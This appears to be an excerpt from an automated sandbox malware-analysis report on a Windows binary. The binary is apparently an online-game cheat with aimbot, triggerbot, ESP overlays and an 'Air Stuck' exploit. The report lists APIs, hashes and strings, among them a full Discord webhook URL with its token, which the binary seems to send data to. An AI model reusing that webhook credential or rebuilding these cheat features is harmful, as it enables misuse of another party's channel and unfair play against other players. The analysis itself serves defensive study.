Opcode Fuzzy Hash: c9bcc7db87e2d8c628c8dffa5ca9983a5de8c2b7fd5a8934495827476f989654
Instruction Fuzzy Hash: 92515336608A41C6EF208F59E4A1239A7A0FF88F95B15853ACE5E877B5CF3DD449C304

Function 00007FF68B4C8550 Relevance: 3.8, APIs: 3, Instructions: 76
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68B4B2230: _Query_perf_frequency.MSVCP140 ref: 00007FF68B4B223D
Part of subcall function 00007FF68B4B2230: _Query_perf_counter.MSVCP140 ref: 00007FF68B4B2246

Sleep.KERNEL32 ref: 00007FF68B4C8611
Sleep.KERNEL32 ref: 00007FF68B4C8621
Sleep.KERNEL32 ref: 00007FF68B4C864C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: a50091c0ed790ed5ba4a4af77befc5066d782cce0c07ef899954772bb3204052
Instruction ID: 7fd0504663316a2bc914ac58fafb1aca784bf3a6c36789b07378b0df4111ac2f
Opcode Fuzzy Hash: a50091c0ed790ed5ba4a4af77befc5066d782cce0c07ef899954772bb3204052
Instruction Fuzzy Hash: F121B121B1924AC2EE188A05A12217A5351BF9CF80F44503DEE5E8B7EEED7CE949C740

Function 00007FF68B4B1140 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4B1164
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4B1185

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID:
API String ID: 2168557111-0
Opcode ID: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
Instruction ID: 0a78e289f121d5063c1b7ef4d351f3d679e056363451fb5e96e6e0d84fe9dd63
Opcode Fuzzy Hash: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
Instruction Fuzzy Hash: F6E03932A08B81C2E6008B50F81545AB7A4FF98BC4F904039EBCD87A28CF7CD1A8CB40

Function 00007FF68B4B4220 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF68B4B423F

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Random_device@std@@
String ID:
API String ID: 1041445435-0
Opcode ID: d08acc5a7e096a88d5e8e9658aff98f0d682f492a60f98396909c4c8d5c6f9d6
Instruction ID: 0f1096545973f2a170e810d44e4f09ca892a4d61b4aebc1a2e9ca6fd5a48b85a
Opcode Fuzzy Hash: d08acc5a7e096a88d5e8e9658aff98f0d682f492a60f98396909c4c8d5c6f9d6
Instruction Fuzzy Hash: 3C114632A28681C6EF689B64E0673BA6295FFCD740F405139E55EC3BE9EE7CD2058700

Function 00007FF68B481000 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00007FF68B481006

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: daea00ada0414efe44a44fb4e988689d645bf63cfe94f6c23a42538f84b835a8
Instruction ID: 5ae051463ce21e88a607b7cf38c78ce5f592f73b82fda6a5d389be3a34a799b2
Opcode Fuzzy Hash: daea00ada0414efe44a44fb4e988689d645bf63cfe94f6c23a42538f84b835a8
Instruction Fuzzy Hash: 8CB09268E456A2C6D6182F226C5202521607F1C702F90093DC50A81365CE3C619A8F04

Non-executed Functions

Function 00007FF68B4BB2D0 Relevance: 111.9, APIs: 4, Strings: 59, Instructions: 1685keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF68B4BB323

Part of subcall function 00007FF68B493190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4931F3
Part of subcall function 00007FF68B493190: memcpy.VCRUNTIME140 ref: 00007FF68B493213
Part of subcall function 00007FF68B493190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493233

Part of subcall function 00007FF68B4BA3E0: CreateThread.KERNEL32 ref: 00007FF68B4BA4CA
Part of subcall function 00007FF68B4BA3E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BA505

exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BCE90
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BD11D

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8

Part of subcall function 00007FF68B4B3980: memset.VCRUNTIME140 ref: 00007FF68B4B39B0
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A00
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A12
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A24
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A36
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A48
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A5A
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A6C
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A7E
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A90
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AA2
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3AB4
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AC6
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AD8
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AEA
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AFC
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B0E
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B20
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B32
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B44
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B56
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B68
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B7A
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B8C
Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF68B4B3B9E

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BD1BD

Strings

Rifle Settings, xrefs: 00007FF68B4BCC7F
SMG Settings, xrefs: 00007FF68B4BCBDD
Smoothing, xrefs: 00007FF68B4BC816
##Mains, xrefs: 00007FF68B4BD34F, 00007FF68B4BD383
Rifle Fov, xrefs: 00007FF68B4BCD10
Draw Filled, xrefs: 00007FF68B4BCA1E
(AIR STUCK)RISKY FEATURE:, xrefs: 00007FF68B4BCE50
%.0f, xrefs: 00007FF68B4BB35E
Save/Load, xrefs: 00007FF68B4BD04C
@, xrefs: 00007FF68B4BB59E
config.json, xrefs: 00007FF68B4BD0CD, 00007FF68B4BD16D
##Main1, xrefs: 00007FF68B4BD00C, 00007FF68B4BD040
Prediction, xrefs: 00007FF68B4BC65F, 00007FF68B4BCB4E
Hitbox, xrefs: 00007FF68B4BC8AE
Prediction , xrefs: 00007FF68B4BCBF0
Weapon config, xrefs: 00007FF68B4BCB2A
Combat, xrefs: 00007FF68B4BC22E
Box, xrefs: 00007FF68B4BC99E
Filled Fov, xrefs: 00007FF68B4BC798
Rifle Smooth, xrefs: 00007FF68B4BCCD1
Save Config, xrefs: 00007FF68B4BD0A7
Prediction , xrefs: 00007FF68B4BCD34
Corner, xrefs: 00007FF68B4BC957, 00007FF68B4BC989
Weapon, xrefs: 00007FF68B4BC328, 00007FF68B4BC9F8
Shotgun Smooth, xrefs: 00007FF68B4BCB8D
Visuals, xrefs: 00007FF68B4BC2AB
Semi Config, xrefs: 00007FF68B4BD452
Fov Size, xrefs: 00007FF68B4BC7D7
Config, xrefs: 00007FF68B4BC3A5
Triggerbot, xrefs: 00007FF68B4BC672
Render Count, xrefs: 00007FF68B4BCA90
Sniper Settings, xrefs: 00007FF68B4BCD21
Skeleton, xrefs: 00007FF68B4BCA57
Fov Circle, xrefs: 00007FF68B4BC785
SMG Smooth, xrefs: 00007FF68B4BCC2F
Distance, xrefs: 00007FF68B4BCA7D
Sniper Fov, xrefs: 00007FF68B4BCDB2
Snapline, xrefs: 00007FF68B4BCA44
Triggerbot Delay (ms), xrefs: 00007FF68B4BC72D
Shotgun Settings, xrefs: 00007FF68B4BCB3B
Sniper Smooth, xrefs: 00007FF68B4BCD73
Options, xrefs: 00007FF68B4BD38F
Prediction , xrefs: 00007FF68B4BCC92
Triggerbot Distance (m), xrefs: 00007FF68B4BC772
Orqur Public, xrefs: 00007FF68B4BB382
Username, xrefs: 00007FF68B4BCA31
Misc, xrefs: 00007FF68B4BC422
Rage Config, xrefs: 00007FF68B4BD4B6
Rank, xrefs: 00007FF68B4BCA0B
##Main, xrefs: 00007FF68B4BC505, 00007FF68B4BC539
Aimbot, xrefs: 00007FF68B4BC5B6
%.3f, xrefs: 00007FF68B4BC74B
Unload, xrefs: 00007FF68B4BCE7E
SMG Fov, xrefs: 00007FF68B4BCC6E
Shotgun Fov, xrefs: 00007FF68B4BCBCC
Fov Arrows, xrefs: 00007FF68B4BCA6A
Load Config, xrefs: 00007FF68B4BD143
Legit Config, xrefs: 00007FF68B4BD3EE
Air Stuck, xrefs: 00007FF68B4BCE68

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memcpy$AsyncCreateStateThreadexitfreemallocmemset
String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
API String ID: 2312794053-2218353132
Opcode ID: 845d21d2e6ca2cfff7b227b5af749c745df84f846b3e29e2d9561c4854ad8532
Instruction ID: 7231d4c7b24b32035401c72b059fdd4191e8bee04755764530b312e0bbf257e0
Opcode Fuzzy Hash: 845d21d2e6ca2cfff7b227b5af749c745df84f846b3e29e2d9561c4854ad8532
Instruction Fuzzy Hash: 09237E32909A86C6E700DF25D4422ED7760FF9D744F09963ADA4D976BADF79E088CB00

Function 00007FF68B4B7730 Relevance: 75.5, APIs: 39, Strings: 3, Instructions: 2023COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998

Part of subcall function 00007FF68B4BE8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6

Part of subcall function 00007FF68B4BE8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE975

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8D04
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8D45
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8D86
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8DC5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8E04
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8E43
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8E82
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8EC1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8F00
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8F3F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8F7E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8FC3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9008
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B904D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9092
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B90D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B911C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9161
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B91A6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B91EB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9230
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9275
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B92BA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B92FF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9344
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9389
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B93CE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9413
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9458
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B949D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B94E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9527
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B956C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B95B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B95F6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B963B

Part of subcall function 00007FF68B4C77D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C7828

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9680
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B96C5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B970A

Strings

https://auth.gg/, xrefs: 00007FF68B4B89C9, 00007FF68B4B8A56, 00007FF68B4B8AE3, 00007FF68B4B8B12
success, xrefs: 00007FF68B4B776D, 00007FF68B4B779C, 00007FF68B4B77CB, 00007FF68B4B77FA, 00007FF68B4B7829, 00007FF68B4B7858, 00007FF68B4B7887, 00007FF68B4B78B6, 00007FF68B4B78E5, 00007FF68B4B7914, 00007FF68B4B7943, 00007FF68B4B7972, 00007FF68B4B79A1, 00007FF68B4B79D0, 00007FF68B4B79FF, 00007FF68B4B7A2E, 00007FF68B4B7A5D, 00007FF68B4B7A8C, 00007FF68B4B7ABB, 00007FF68B4B7AEA, 00007FF68B4B7B19, 00007FF68B4B7B48, 00007FF68B4B7B77, 00007FF68B4B7BA6, 00007FF68B4B7BD5, 00007FF68B4B7C04, 00007FF68B4B7C33, 00007FF68B4B7C62, 00007FF68B4B7C91, 00007FF68B4B7CC0, 00007FF68B4B7CEF, 00007FF68B4B7D1E, 00007FF68B4B7D4D, 00007FF68B4B7D7C, 00007FF68B4B7DAB, 00007FF68B4B7DDA, 00007FF68B4B7E09, 00007FF68B4B7E38, 00007FF68B4B7E67, 00007FF68B4B7E96, 00007FF68B4B7EC5, 00007FF68B4B7EF4, 00007FF68B4B7F23, 00007FF68B4B7F52, 00007FF68B4B7F81, 00007FF68B4B7FB0, 00007FF68B4B7FDF, 00007FF68B4B800E, 00007FF68B4B803D, 00007FF68B4B806C, 00007FF68B4B809B, 00007FF68B4B80CA, 00007FF68B4B80F9, 00007FF68B4B8128, 00007FF68B4B8157, 00007FF68B4B8186, 00007FF68B4B81B5, 00007FF68B4B81E4, 00007FF68B4B8213, 00007FF68B4B8242, 00007FF68B4B8271, 00007FF68B4B82A0, 00007FF68B4B82CF, 00007FF68B4B82FE, 00007FF68B4B832D, 00007FF68B4B835C, 00007FF68B4B838B, 00007FF68B4B83BA, 00007FF68B4B83E9, 00007FF68B4B8418, 00007FF68B4B8447, 00007FF68B4B8476, 00007FF68B4B84A5, 00007FF68B4B84D4, 00007FF68B4B8503, 00007FF68B4B8532, 00007FF68B4B8561, 00007FF68B4B8590, 00007FF68B4B85BF, 00007FF68B4B85EE, 00007FF68B4B861D, 00007FF68B4B864C, 00007FF68B4B867B, 00007FF68B4B86AA, 00007FF68B4B86D9, 00007FF68B4B8708, 00007FF68B4B8737, 00007FF68B4B8795, 00007FF68B4B87C4, 00007FF68B4B87F3, 00007FF68B4B8822, 00007FF68B4B8880, 00007FF68B4B88AF, 00007FF68B4B88DE, 00007FF68B4B890D, 00007FF68B4B893C, 00007FF68B4B896B, 00007FF68B4B899A, 00007FF68B4B89F8, 00007FF68B4B8A27, 00007FF68B4B8A85, 00007FF68B4B8AB4, 00007FF68B4B8B3B, 00007FF68B4B8B61, 00007FF68B4B8B87, 00007FF68B4B8BAD, 00007FF68B4B8BD3, 00007FF68B4B8BF9, 00007FF68B4B8C45, 00007FF68B4B8C6D, 00007FF68B4B8C96, 00007FF68B4B8CBF
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK, xrefs: 00007FF68B4B8766, 00007FF68B4B8851, 00007FF68B4B8C1F

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_task
String ID: https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
API String ID: 73660495-2681837100
Opcode ID: 16fb97de7e87b266f899160ba4c753a49c8520d58aa95855b6988663c97e59e3
Instruction ID: 4407257853c85852608059138535aa5973c6f70d91d472d6f97f19d400c95fe2
Opcode Fuzzy Hash: 16fb97de7e87b266f899160ba4c753a49c8520d58aa95855b6988663c97e59e3
Instruction Fuzzy Hash: 3A13B652E65BC684FB20DB35C8423FD1311BFEA784F10672AE55D979AADF68B684C300

Function 00007FF68B4C268B Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
